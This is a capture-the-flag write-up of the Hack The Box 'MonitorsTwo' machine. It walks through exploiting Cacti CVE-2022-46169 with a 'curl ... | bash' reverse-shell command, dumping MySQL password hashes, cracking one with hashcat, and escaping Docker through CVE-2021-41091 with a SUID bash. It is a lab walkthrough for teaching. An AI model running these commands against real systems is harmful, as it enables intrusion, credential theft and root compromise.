MonitorsTwo required us to enumerate the target machine to locate an HTTP service. Further investigation of the http service reveals that it is vulnerable to Remote Code Execution. As a result of exploiting that vulnerability, we are able to obtain the shell for the service container. Upon enumerating the container, credentials for the MYSQL service are discovered. Our newly discovered credentials allow us to query the databases present and obtain a username and password hash for the user Marcus. We are able to obtain a user shell within the host machine after cracking the hash. Through further enumeration, we are able to retrieve an email stating three vulnerabilities present on the machine. We are able to escalate to root privileges by exploiting the last vulnerability mentioned.
Recon
nmap (TCP all ports)
nmap finds two open TCP ports, SSH (22) and a HTTP server (80):
$ nmap -p- 10.129.80.186
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-01 11:33 WEST
Nmap scan report for 10.129.80.186
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 23.07 seconds
$
nmap (found TCP ports exploration)
$ nmap -sC -sV -p 22,80 10.129.80.186
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-01 11:41 WEST
Nmap scan report for 10.129.80.186
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.74 seconds
$
HTTP - TCP 80
Technologies used:
By checking the webpage presented to us with Wappalyzer, we can get to know what technologies are being used:
Landing page
By going to the root directory for the HTTP service we are presented with the following landing page.
We can see with this that the service running is an instance of Cacti on the version 1.2.22.
Shell as www-data (inside Docker)
Unauthenticated RCE
The version is vulnerable to an RCE vulnerability (CVE-2022-46169) as described in this BlogPost.
To take advantage of this vulnerability we can use the following POC
$ python3 CVE-2022-46169.py -c 'curl http://10.10.15.92/shell | bash' http://10.129.80.186/
[*] Trying for 1 - 100 host ids
By checking on the listening port we can see that we get a shell as the user www-data:
$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.80.186 56108
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Shell as root (inside Docker)
By checking the SUID commands present within the machine we landed we can see that we have root permitions.
$ find / -user root -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
$ capsh --gid=0 --uid=0 --
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
This is rather odd, by taking a deeper look we see why:
$ ls -la
ls -la
total 84
drwxr-xr-x 1 root root 4096 Mar 21 10:49 .
drwxr-xr-x 1 root root 4096 Mar 21 10:49 ..
-rwxr-xr-x 1 root root 0 Mar 21 10:49 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 22 13:21 bin
drwxr-xr-x 2 root root 4096 Mar 22 13:21 boot
drwxr-xr-x 5 root root 340 Apr 29 22:40 dev
-rw-r--r-- 1 root root 648 Jan 5 11:37 entrypoint.sh
$
This is because we are inside a docker container.
Shell as marcus
By checking the entrypoint.sh file we can see that some hard coded credentials are being used.
$ cat /entrypoint.sh
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
$
Theses credentials enable us to interact with the MYSQL service present within the machine, this enables us to find another set of credentials:
$ mysql --host=db --user=root --password=root cacti -e "SELECT * FROM user_auth"
id username password <SNIP>
1 admin $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC <SNIP>
3 guest 43e9a4ab75570f5b <SNIP>
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C <SNIP>
$
By using the tool hashcat we can retrieve the original password for the user marcus:
$ hashcat -m 3200 hash.txt /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.5) starting
<SNIP>
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C:funkymonkey
<SNIP>
$
The credentials found are therefore the following:
marcus:funkymonkey
Now what remains for us to do is try to ssh onto the machine with the found credentials:
$ ssh marcus@monitorstwo.htb
The authenticity of host '10.129.80.186 (10.129.80.186)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.80.186' (ED25519) to the list of known hosts.
marcus@10.129.80.186's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 01 May 2023 04:17:55 PM UTC
System load: 1.0
Usage of /: 63.4% of 6.73GB
Memory usage: 18%
Swap usage: 0%
Processes: 249
Users logged in: 0
IPv4 address for br-60ea49c21773: 172.18.0.1
IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.80.186
IPv6 address for eth0: dead:beef::250:56ff:fe96:24db
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$
Shell as root
Within the /var/mail folder, there’s some mail for marcus:
marcus@monitorstwo:~$ cat /var/mail/marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
marcus@monitorstwo:~$
The first two vulnerabilities aren’t that useful for us but the third one references the following vulnerability this could be leveraged to obtain a root shell within the system. The vulnerability in short mentions that when dockers are created some SUID binaries carry their permissions over to the host machine.
To take advantage of this vulnerability we first change the permissions of a binary within the container we previously escaped from:
$ bash -p
chmod 4755 /bin/bash
exit
$ bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
exit
$
This binary will be later used to carry it’s permissions over to the host machine, enabling us a root shell..
Now we need to find the mount point with the help of df:
marcus@monitorstwo:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 1.9G 0 1.9G 0% /dev
tmpfs 394M 1.3M 392M 1% /run
/dev/sda2 6.8G 4.3G 2.4G 65% /
tmpfs 2.0G 0 2.0G 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 2.0G 0 2.0G 0% /sys/fs/cgroup
overlay 6.8G 4.3G 2.4G 65% /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
shm 64M 0 64M 0% /var/lib/docker/containers/e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69/mounts/shm
overlay 6.8G 4.3G 2.4G 65% /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
shm 64M 0 64M 0% /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/mounts/shm
tmpfs 394M 0 394M 0% /run/user/1000
marcus@monitorstwo:~$
Now that we know the container mountpoint we just need to run the container’s SUID binary to achieve a root shell on the host machine:
marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
bash-5.1#